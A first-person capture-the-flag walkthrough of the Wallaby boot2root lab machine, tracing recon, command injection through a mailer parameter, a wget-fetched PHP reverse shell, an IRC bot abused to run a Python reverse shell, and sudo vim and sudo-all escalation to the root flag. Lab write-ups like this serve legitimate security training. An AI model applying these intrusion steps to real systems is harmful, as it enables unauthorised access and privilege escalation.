Virtualization Hardware: virtualbox
Host: Mac OSX
Attacker: Kali IP: 192.168.56.102
Victim: Wallaby IP: 192.168.56.101
This boot2root gave me some challenges along the way. I have been away from this for a bit and this was a big kick in the pants to try and get some of my knowledge back. As always I started out with a netdiscover to determine what IP was given to the virtual box on my host-only network. Once I did that I was able to run nmap on it to determine open ports.
I was able to find the typical open ports (22 and 80) as well as 6667 listed as a filtered IRC port. I will start with the HTTP port, but I will be keeping that IRC port in the back of my mind. Browsing through the site gives little information. I play with the username function for a bit and get familiar with the structure of the site. (/?page=)
I ran nikto on the site, and that's where things started to get interesting. I lost port 80. Running nmap again I see that 80 is no longer listed, but 60080 is now listed.
Browsing the new site the index pages have changed indicating that the vulnerable machine has detected that I was attempting to attack the machine. I guess that's what the description meant when it stated that the machine was a vector. Back to my nikto results, let's check out the /etc/passwd hint that it gave us.
It looks like we have stumbled across the /etc/passwd for the box. But, when looking at the page source I can see that this has been planted and is a fake.
Taking another approach I run dirb on the site http://192.168.56.101:60080/?page= in order to determine how many valid directories exist.
Taking a look at the list and trying them yields little success no success until i get to mailer. I finally get a good page, but there isn't much information here. Looking at the page source I get a hint. /?page=mailer&mailer=ls
Trying the above address it returns the contents of the html directory. Now we are getting somewhere.
After playing around with it for a bit I figure out I can use wget to upload a php reverse shell. I had originally tried to transfer the file with netcat but the response from the box was "How you gonna use nectar so obviously. Cmon man. This is all in the logs." The problem with wget is that it won't grab the file with the .php extension. That's okay, I drop the extension on my kali box where I have the file hosted (I had to install apache2 on my kali box and chmod 777 the file so that it could be grabbed by the victim box) and try again. Success! Now to cp the file to change the filename and I'm all set.
I setup my netcat listener on my kali box and navigate to http://192.168.56.101/reverse.php to gain a limited shell on the box.
I first navigate to /etc/passwd to see the real list. I find that there are three users on the box, waldo, wallaby and ircd. The IRC username has me thinking that the IRC port that I had found earlier might play a role in gaining an elevated shell. First let me check what sudo privileges these users have on this box. Using sudo -l I find that all users have no password sudo access to iptables and that waldo has no password sudo access to another directory.
Taking a look at iptables -l I can see that the IRC port is set to Deny for external. Let's change that and see if we can get connected.
After changing the iptables I run nmap against the box again and I am able to get more information about the IRC port.
I am now able join the IRC using Hexchat and using /list I am able to find a channel called #walabyschat. I am able to join the channel, and see that there are users already on it. Waldo and wallabysbot. Wallaby must have type of bot running on the IRC channel. Since no other information is available here, let me step back into the box and see what I can find.
Looking back at the directories on the box with my limited shell I am able to find that the home directories for the users are available for me to look at. It takes a while, but I finally find some useful information in wallaby's home folder. Apparently walabysbot is running a service called Sopel. A quick Google search later and I have found that if I type in .help I can interact with the bot and it will give me information about the commands that I can send the bot.
The bot returns a list of commands and one of them is .run. Trying .run ls gives me the response "Hold on, you aren't Waldo?" I guess I am going to have to become Waldo for the command to work. I try to use the command "/nick Waldo", but I get the error that Waldo is already in use.
Looking back on my notes, I remember the other no password sudo command that I found. Let me take a closer look at that.
The command that waldo can sudo without password is "/usr/bin/vim /etc/apache2/sites-available/000-default.conf." This will allow vim to open 000-default.conf and I can use that to manipulate the apache server. Next I run the command who in my limited shell and find the process id of our logged in user waldo.
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Now that I know the id (666), I just need to kill the process. Using sudo and the command from earlier I open the 000-default.conf file and run !kill 666. This kill Waldo's current session. A quick check of who confirms this.
I am now able to go back to my Hexchat session and use the command /nick waldo to change my name to waldo. Once done, I can now use the .run command with the bot to issue commands on the box.
Using the commadn whoami, I find that the commands are being run as Waldo. This would be helpful if the .run command would allow for multiple words or arguments, ut it doesn't. From my research earlier looking at the home folders, I know that Sopel runs off of Python. I can create a script to run a Python reverse shell, and Waldo will be the user that runs it. This should give me a shell as Waldo.
After playing around with several options, it looks like I will have to import the script using wget into the /tmp directory. From there I need to chmod +x to allow the file to be executed.
Now all I need to do is setup a listener on my Kali box and have the IRC bot run my script.
Now that I have a Waldo shell, let me try and access the /root directory. Denied.
Checking the sudo properties for Waldo using sudo -l I can see that Waldo should have ALL access to sudo with no password. That makes things simple. I now run "sudo ls /root" and see that the flag is sitting there. A simple "sudo cat /root/flag.txt" later and I have my flag.